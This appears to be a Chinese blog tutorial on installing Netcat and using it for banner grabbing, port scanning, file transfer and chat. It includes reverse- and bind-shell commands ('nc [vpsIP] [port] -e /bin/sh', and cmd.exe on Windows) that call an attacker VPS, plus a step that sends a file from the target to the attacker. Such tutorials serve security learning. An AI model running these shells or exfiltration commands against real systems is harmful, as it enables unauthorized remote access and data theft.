Netcat安装使用详解

Netcat

从网络的一段读取数据,输出到网络的另一端(可以使用于TCP和UDP协议)
 

安装
  1. Windows可自行在github上下载netcat

  2. kali linux上
    方法一:
    sudo yum install nc.x86_64
    方法二:

wget http://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1.tar.gz/download -O netcat-0.7.1.tar.gz
tar zxvf netcat-0.7.1.tar.gz
cd netcat-0.7.1
./configure
make
编译完成,就会生成nc可以执行的文件。文件位于src目录。cd到src目录
运行 ./netcat
使用
命令查询 nc -h
参数: 
-d 后台模式
-e 程序重定向,一旦连接,就执行 [危险!!] 
-g 网关,设置路由器跳跃通信网关
-G 设置源路由指向器的数量
-h 帮助信息 
-i 设置时间间隔 
-l 监听模式,用于入站连接 
-n 指定数字的IP地址,不能用hostname 
-o file 记录16进制的传输 
-p port 本地端口号 
-r 任意指定本地及远程端口 
-s addr本地源地址 
-u UDP模式 
-v 详细输出——用两个-v可得到更详细的内容 
-w secs timeout的时间 
-z 将输入输出关掉——只在扫描通信端口时使用
常用命令

一、Banner抓取
服务的Banner信息能够为系统管理员提供当前网络中的系统信息和所运行服务的情况。服务的Banner信息不仅包含正在运行的服务类型,还包含版本信息

nc -nv [目标IP] [port]
在这里插入图片描述
二、远程连接远程主机
nc -nvv [目标IP] [port]
因为没有给它传输什么数据内容,所以NO_DATA
在这里插入图片描述
三、端口扫描
nc -v [目标IP] [port]
在这里插入图片描述
段端口扫描
nc -v -z [目标IP] [port1-portN]
(速度极慢)
在这里插入图片描述
四、端口监听
nc -l -p [监听本地端口]
在这里插入图片描述
五、文件传输流入(本地主机)
nc -lp [监听本地端口] > 1.txt
文件传输流出(目标主机)
nc -vn [攻击机IP] [攻击机监听端口] < 1.txt
在这里插入图片描述在这里插入图片描述
六、简易聊天(本地主机)
nc -lp [监听端口]
简易聊天(目标主机)
nc -vn [攻击机IP] [攻击机监听端口]
在这里插入图片描述

七、反弹shell
正向与反向。反向通常用在开启防护措施的目标机器上
1.正向shell
目标主机执行如下命令,监听目标本机端口
(linux)nc -lvp 4444 -e /bin/sh
(windows)nc -lvp 4444 -e c:\windows\system32\cmd.exe
vps执行如下命令,连接目标主机的4444端口
nc [目标主机IP] [目标主机监听端口]

2.反向shell
vps执行如下命令,监听本机端口
nc -lvvp 9999
目标主机执行如下命令,连接vps的9999端口
(linux)nc [vpsIP] [vps监听端口] -e /bin/sh
(windows)nc [vpsIP] [vps监听端口] -e c:\windows\system32\cmd.exe
在这里插入图片描述
可以在其新建隐藏文件
在这里插入图片描述
输入 attrib +h +r +s文件夹名,意思就是把该文件夹隐藏、只读操作
在这里插入图片描述
没恢复可看文件时还不能直接删除,attrib -h -r -s就能正常看到文件夹了
在这里插入图片描述
 
GOT IT!

 
******************************************************
小实验小结,具体测试利用方式需根据具体实践场景~

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章